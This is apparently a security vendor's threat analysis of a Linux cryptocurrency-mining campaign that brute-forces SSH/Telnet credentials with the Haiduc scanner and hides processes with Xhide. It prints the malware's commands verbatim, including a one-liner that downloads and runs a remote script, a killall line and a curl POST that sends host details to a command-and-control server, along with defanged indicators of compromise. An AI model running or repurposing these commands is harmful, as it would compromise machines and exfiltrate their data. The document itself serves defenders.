Cryptocurrency Miner Uses Hacking Tool Haiduc and App Hider Xhide to Brute Force Machines and Servers

By Augusto Remillano II and Jemimah Molina (Threats Analysts)

A Trend Micro honeypot detected a cryptocurrency-mining threat on a compromised site, where the URL hxxps://upajmeter[.]com/assets/.style/min was used by the miner to host the command for downloading the main shell script (detected by Trend Micro as Trojan.SH.MALXMR.UWEJS). The cryptocurrency-miner, a multi-component threat comprised of different Perl and Bash scripts, miner binaries, the application hider Xhide, and a scanner tool, propagates by scanning vulnerable machines and brute-forcing (primarily default) credentials.

Analysis of the threat revealed that the threat actor behind the malicious activity executes component files that run multiple times daily so that the infected machine’s status is regularly sent to the command-and-control server (C&C). The shell script used in the infection is also capable of downloading archived files that contain the miner’s scanner, hider, and final payload.

The threat also employs a process hider to conceal the miner binary, which makes a typical user more unlikely to notice the mining activity save for a drop in performance and suspicious network traffic. This method has been a known cover for threat actors that aim to scan, brute force, and mine.

The infection

The attacker starts by gaining access to a machine through weak or default credentials. Then, a command will be run on the compromised machine:

cd /tmp;wget hxxps://upajmeter[.]com/assets/.style/min;curl -O hxxps://upajmeter[.]com/assets/.style/min;chmod +x min;perl min;rm -rf min*

The initial file min (detected as Trojan.Perl.MALXMR.UWEJS) downloads another file min.sh (detected as Trojan.SH.MALXMR.UWEJS), which is the main shell script that installs the various components of this threat. After executing the main shell script, it will try to kill existing cryptocurrency-mining processes:

killall -9 rand rx rd tsm tsm2 haiduc a sparky.sh 2238Xae b f i p y rsync ps go x s b run idle minerd crond yam xmr python cron ntpd start start.sh libssl sparky.sh

The shell script also downloads and executes the component file downloaders cron.sh and nano.sh (Trojan.SH.MALXMR.UWEJT), which are executed daily by the hour and every 30 minutes respectively. These files drop rcmd.sh (detected as Trojan.SH.MALXMR.UWEJU), which is responsible for regularly reporting back to the C&C via an HTTP post request on the status of the infected machine:

curl -d "info=POST&data=SERVER---> $(whoami)@$SERVERIP
DATE---> $(date)
SERV---> $(uname -a) ===> $(nproc) PROCESORS ===> VIDEO $(lspci | grep VGA) ===>$(ps x|grep bash)" hxxp://upajmeter[.]com/assets/.style/remote/info.php > /dev/null

The archived files

The shell script is also capable of downloading and extracting the miner archive monero.tgz (detected as Trojan.Linux.MALXMR.UWEJS) for the execution of its contents. The archive file contains the miner binaries, which can be executed by various shell and Perl scripts that are also contained in the file.

The contents of the archive file are primarily configuration files and those that execute various component files, such as config.txt, cpu.txt, h32 (Xhide 32-bit), h64 (Xhide 64-bit), pools.txt, run, startMSR, x, x.pl, xmr-stak, and xmrig. The binary Xhide is responsible for hiding cryptocurrency-mining processes through changing process names into “-bash”.

The main shell script then proceeds to download and extract the scanner archive sslm.tgz (detected as Trojan.Linux.SSHBRUTE.UWEJS) for execution. The archive houses the Telnet/SSH scanner binary, the corresponding shell and Perl scripts that will execute it, and the list of passwords that will be used for scanning.

The contents of the scanner archive include .pass (short password list used for random public IP blocks), pass (long password list used for private IP blocks), libssl (the UPX-packed Haiduc scanner), sparky.sh, start, start.pl, and start.sh.

The scanner would attempt to infect and gain control of devices in a private IP range (It will try to infect all devices in the same local network as the host machine) by brute forcing a list of credentials that contain 3,637 username and password combinations. It also tries to infect devices in the public IP range of {random number from 0-216}.0.0.0/8 by using a different, shorter credentials list. Based on the credentials used, the attack mostly targets servers related to databases, storages, gaming, and mining rigs.

If successful, the attacker will then be able to issue the aforementioned commands for cryptocurrency-mining.

Protecting devices from cryptocurrency-mining threats

The threat actors behind this cryptocurrency-miner have utilized Haiduc and Xhide, known and old tools that have been notoriously used for various malicious activities. These tools, combined with brute-forced weak credentials, can persist in systems while operating under the radar of traditional network security solutions. Such malware can also affect system performance and expose users to other forms of compromise.

While we haven’t seen widespread attacks from this threat actor yet, users should adopt security measures that can defend systems against any potential attacks, such as:

• Taking caution against known attack vectors such as unsolicited emails, socially engineered links and attachments, suspicious websites, and dubious third-party applications
• Changing devices’ default credentials to prevent unauthorized access
• Updating devices with the latest patches
• Regularly verifying that all created accounts are only used for legitimate purposes

Indicators of compromise (IoCs)

SHA-256

Related malicious URLs

139[.]99[.]42[.]75:3333

pool[.]masari[.]hashvault[.]pro:3333

hxxps://upajmeter[.]com/assets/.style/min

hxxps://upajmeter[.]com/assets/.style/min.sh

hxxps://upajmeter[.]com/assets/.style/remote/cron.sh

hxxps://upajmeter[.]com/assets/.style/monero.tgz

hxxps://upajmeter[.]com/assets/.style/sslm.tgz

hxxps://upajmeter[.]com/assets/.style/remote/info.php

hxxps://upajmeter[.]com/assets/.style/remote/rcmd.sh